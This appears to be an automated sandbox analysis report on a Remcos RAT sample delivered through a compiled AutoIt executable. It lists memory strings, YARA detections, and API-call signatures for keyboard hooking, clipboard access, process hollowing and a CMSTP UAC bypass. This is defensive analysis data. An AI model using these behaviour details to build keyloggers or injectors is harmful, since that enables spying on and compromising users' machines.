Source: bhv5230.tmp.7.dr	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: svchost.exe, 00000007.00000003.2868404025.0000000003144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
Source: svchost.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: svchost.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv5230.tmp.7.dr	String found in binary or memory: https://www.office.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

6_2_0040A2B8

Installs a global keyboard hook

Source: C:\Windows\SysWOW64\svchost.exe

Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\svchost.exe

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_0008425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0008425A

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00084458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	0_2_00084458
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00114458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_00114458
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	6_2_004168C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	7_2_0040987A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	7_2_004098E2

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

0_2_0008425A

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00070219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00070219

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0009CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_0009CDAC
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0012CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		5_2_0012CDAC

E-Banking Fraud

Contains functionalty to change the wallpaper

Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2877207597.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 8048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8084, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_0041C9E2 SystemParametersInfoW,

6_2_0041C9E2

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: name.exe PID: 8048, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 8084, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00013B4C
Source: cnaniAxghZ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: cnaniAxghZ.exe, 00000000.00000000.1620231758.00000000000C5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2bb9372d-e
Source: cnaniAxghZ.exe, 00000000.00000000.1620231758.00000000000C5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4c7fb676-b
Source: cnaniAxghZ.exe, 00000000.00000003.2795789078.0000000003CA5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4522a80f-f
Source: cnaniAxghZ.exe, 00000000.00000003.2795789078.0000000003CA5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1302d4fb-d
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: This is a third-party compiled AutoIt script.	5_2_000A3B4C
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000005.00000000.2809555856.0000000000155000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_37850323-c
Source: name.exe, 00000005.00000000.2809555856.0000000000155000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_26da15f7-9
Source: cnaniAxghZ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7b96de99-6
Source: cnaniAxghZ.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_96ed0e6b-8
Source: name.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2c2517af-6
Source: name.exe.0.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_03223356-2

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	6_2_004180EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	7_2_0040DD85
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401806 NtdllDefWindowProc_W,	7_2_00401806
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004018C0 NtdllDefWindowProc_W,	7_2_004018C0

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00074021: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00074021

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00068858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00068858

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	0_2_0007545F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	5_2_0010545F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,	6_2_004167B4

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0001E800	0_2_0001E800
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003DBB5	0_2_0003DBB5
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0009804A	0_2_0009804A
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0001E060	0_2_0001E060
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00024140	0_2_00024140
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00032405	0_2_00032405
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00046522	0_2_00046522
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00090665	0_2_00090665
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0004267E	0_2_0004267E
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003283A	0_2_0003283A
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00026843	0_2_00026843
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_000489DF	0_2_000489DF
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00028A0E	0_2_00028A0E
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00046A94	0_2_00046A94
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00090AE2	0_2_00090AE2
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0006EB07	0_2_0006EB07
